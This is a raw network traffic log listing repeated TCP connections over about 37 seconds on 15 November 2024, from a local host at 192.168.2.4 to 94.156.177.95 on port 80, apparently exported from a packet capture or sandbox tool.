Nov 15, 2024 18:15:02.623672962 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.628530979 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.762084007 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.767106056 CET	80	49785	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.767184973 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.769289970 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.774126053 CET	80	49785	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.774194002 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.779140949 CET	80	49785	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:03.754801989 CET	80	49785	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:03.759207010 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.765726089 CET	80	49785	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:03.765810966 CET	49785	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.927130938 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.932480097 CET	80	49795	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:03.935173988 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.937114954 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.942403078 CET	80	49795	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:03.942454100 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:03.947247982 CET	80	49795	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:04.921854019 CET	80	49795	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:04.924438953 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:04.930006981 CET	80	49795	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:04.930079937 CET	49795	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:05.061566114 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:05.066698074 CET	80	49802	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:05.066926003 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:05.069040060 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:05.073877096 CET	80	49802	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:05.073941946 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:05.078753948 CET	80	49802	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:06.033854961 CET	80	49802	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:06.034035921 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.039433002 CET	80	49802	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:06.039539099 CET	49802	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.186952114 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.191931009 CET	80	49808	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:06.192004919 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.194040060 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.199142933 CET	80	49808	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:06.199202061 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:06.204097986 CET	80	49808	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:07.183650017 CET	80	49808	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:07.183768988 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.188929081 CET	80	49808	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:07.188998938 CET	49808	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.350434065 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.355288982 CET	80	49813	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:07.355362892 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.364787102 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.370201111 CET	80	49813	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:07.370279074 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:07.375447035 CET	80	49813	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:08.327786922 CET	80	49813	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:08.327887058 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.333134890 CET	80	49813	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:08.333200932 CET	49813	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.467777014 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.472826958 CET	80	49818	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:08.472908020 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.474978924 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.480079889 CET	80	49818	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:08.480132103 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:08.484894037 CET	80	49818	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:09.442281008 CET	80	49818	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:09.444468975 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.449702978 CET	80	49818	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:09.449758053 CET	49818	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.746893883 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.752048969 CET	80	49825	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:09.752165079 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.754107952 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.759147882 CET	80	49825	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:09.759212971 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:09.764420033 CET	80	49825	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:10.714437962 CET	80	49825	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:10.714556932 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.720088959 CET	80	49825	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:10.720149994 CET	49825	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.857007027 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.862014055 CET	80	49832	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:10.862103939 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.864219904 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.869103909 CET	80	49832	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:10.869167089 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:10.874162912 CET	80	49832	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:11.828722000 CET	80	49832	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:11.839293957 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:11.845061064 CET	80	49832	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:11.845119953 CET	49832	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:11.989914894 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:11.994944096 CET	80	49836	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:11.995023966 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:11.997169971 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:12.002365112 CET	80	49836	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:12.002434015 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:12.007308006 CET	80	49836	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:12.948380947 CET	80	49836	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:12.948555946 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:12.953797102 CET	80	49836	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:12.953867912 CET	49836	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:13.092339039 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:13.097429991 CET	80	49841	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:13.097554922 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:13.099525928 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:13.104549885 CET	80	49841	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:13.104631901 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:13.109535933 CET	80	49841	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:14.079732895 CET	80	49841	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:14.079858065 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.085123062 CET	80	49841	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:14.085196972 CET	49841	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.224085093 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.229012966 CET	80	49849	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:14.229094028 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.231035948 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.235937119 CET	80	49849	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:14.236002922 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:14.240854979 CET	80	49849	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:15.183604956 CET	80	49849	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:15.183718920 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.188874006 CET	80	49849	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:15.188944101 CET	49849	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.336878061 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.341862917 CET	80	49855	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:15.342014074 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.343772888 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.349330902 CET	80	49855	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:15.349390984 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:15.354389906 CET	80	49855	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:16.283584118 CET	80	49855	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:16.283699989 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.288997889 CET	80	49855	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:16.289061069 CET	49855	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.421751976 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.426743984 CET	80	49860	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:16.426812887 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.428797960 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.433655024 CET	80	49860	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:16.433712959 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:16.438498974 CET	80	49860	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:17.363177061 CET	80	49860	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:17.363461971 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.368827105 CET	80	49860	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:17.368908882 CET	49860	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.521342993 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.526283979 CET	80	49865	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:17.526384115 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.533133030 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.537991047 CET	80	49865	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:17.538065910 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:17.542926073 CET	80	49865	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:18.468389988 CET	80	49865	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:18.468561888 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.474006891 CET	80	49865	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:18.474093914 CET	49865	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.620117903 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.624979973 CET	80	49869	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:18.625065088 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.628218889 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.633055925 CET	80	49869	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:18.633126020 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:18.638026953 CET	80	49869	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:19.607048988 CET	80	49869	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:19.607161045 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.612494946 CET	80	49869	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:19.612555981 CET	49869	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.752296925 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.757266998 CET	80	49875	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:19.757477999 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.760445118 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.765239000 CET	80	49875	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:19.765315056 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:19.770119905 CET	80	49875	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:20.770309925 CET	80	49875	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:20.770566940 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.775938988 CET	80	49875	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:20.776019096 CET	49875	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.925477028 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.930619955 CET	80	49879	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:20.930752039 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.933852911 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.938893080 CET	80	49879	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:20.938966990 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:20.944015026 CET	80	49879	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:21.913968086 CET	80	49879	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:21.914705038 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:21.920074940 CET	80	49879	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:21.920218945 CET	49879	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:22.062906981 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:22.068015099 CET	80	49884	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:22.068258047 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:22.070224047 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:22.075076103 CET	80	49884	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:22.075165033 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:22.080008984 CET	80	49884	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:23.029581070 CET	80	49884	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:23.029911041 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.035295010 CET	80	49884	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:23.035510063 CET	49884	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.170898914 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.175822020 CET	80	49888	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:23.175893068 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.178268909 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.183150053 CET	80	49888	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:23.183307886 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:23.188147068 CET	80	49888	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:24.542594910 CET	80	49888	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:24.551139116 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.556824923 CET	80	49888	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:24.557250977 CET	49888	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.792871952 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.797955036 CET	80	49895	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:24.798085928 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.801156044 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.806076050 CET	80	49895	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:24.806145906 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:24.811108112 CET	80	49895	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:25.761615992 CET	80	49895	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:25.761835098 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:25.767137051 CET	80	49895	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:25.767213106 CET	49895	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:25.913006067 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:26.042778015 CET	80	49900	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:26.043028116 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:26.045871019 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:26.050766945 CET	80	49900	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:26.050868034 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:26.055706978 CET	80	49900	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:27.028803110 CET	80	49900	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:27.028959990 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.034568071 CET	80	49900	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:27.034645081 CET	49900	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.192898989 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.197841883 CET	80	49905	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:27.198071003 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.202425957 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.207267046 CET	80	49905	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:27.207350969 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:27.212131023 CET	80	49905	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:28.160433054 CET	80	49905	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:28.161345959 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.166501045 CET	80	49905	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:28.166551113 CET	49905	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.316482067 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.321474075 CET	80	49911	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:28.321561098 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.323595047 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.328593969 CET	80	49911	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:28.328660965 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:28.333580971 CET	80	49911	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:29.272986889 CET	80	49911	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:29.273082972 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.278461933 CET	80	49911	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:29.278522015 CET	49911	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.430964947 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.435877085 CET	80	49918	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:29.436100960 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.439150095 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.443953991 CET	80	49918	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:29.444036007 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:29.448923111 CET	80	49918	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:30.400077105 CET	80	49918	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:30.400379896 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.406276941 CET	80	49918	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:30.406358957 CET	49918	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.545799971 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.550962925 CET	80	49923	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:30.551075935 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.553162098 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.558265924 CET	80	49923	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:30.558346033 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:30.563545942 CET	80	49923	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:32.028471947 CET	80	49923	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:32.028610945 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.033879042 CET	80	49923	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:32.033950090 CET	49923	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.172832012 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.178314924 CET	80	49932	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:32.178414106 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.180358887 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.185190916 CET	80	49932	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:32.185276031 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:32.190172911 CET	80	49932	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:33.186584949 CET	80	49932	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:33.186722994 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.192061901 CET	80	49932	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:33.192136049 CET	49932	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.330781937 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.335686922 CET	80	49936	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:33.335887909 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.338016033 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.342878103 CET	80	49936	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:33.342989922 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:33.347816944 CET	80	49936	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:34.312840939 CET	80	49936	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:34.312997103 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.318228960 CET	80	49936	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:34.318326950 CET	49936	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.449246883 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.454062939 CET	80	49942	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:34.454139948 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.456140995 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.460957050 CET	80	49942	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:34.461021900 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:34.465934992 CET	80	49942	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:35.454488039 CET	80	49942	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:35.454641104 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.460047960 CET	80	49942	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:35.460144043 CET	49942	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.594315052 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.599422932 CET	80	49949	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:35.599538088 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.601607084 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.606766939 CET	80	49949	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:35.606842041 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:35.611757994 CET	80	49949	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:36.557085037 CET	80	49949	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:36.557200909 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.562589884 CET	80	49949	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:36.562678099 CET	49949	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.922091961 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.927107096 CET	80	49956	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:36.927181005 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.934304953 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.942770004 CET	80	49956	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:36.942826986 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:36.952189922 CET	80	49956	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:37.889698029 CET	80	49956	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:37.893726110 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:37.899106979 CET	80	49956	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:37.899164915 CET	49956	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:38.026782036 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:38.033514977 CET	80	49965	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:38.033602953 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:38.035571098 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:38.040489912 CET	80	49965	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:38.040555954 CET	49965	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:38.045456886 CET	80	49965	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:39.001919985 CET	80	49965	94.156.177.95	192.168.2.4
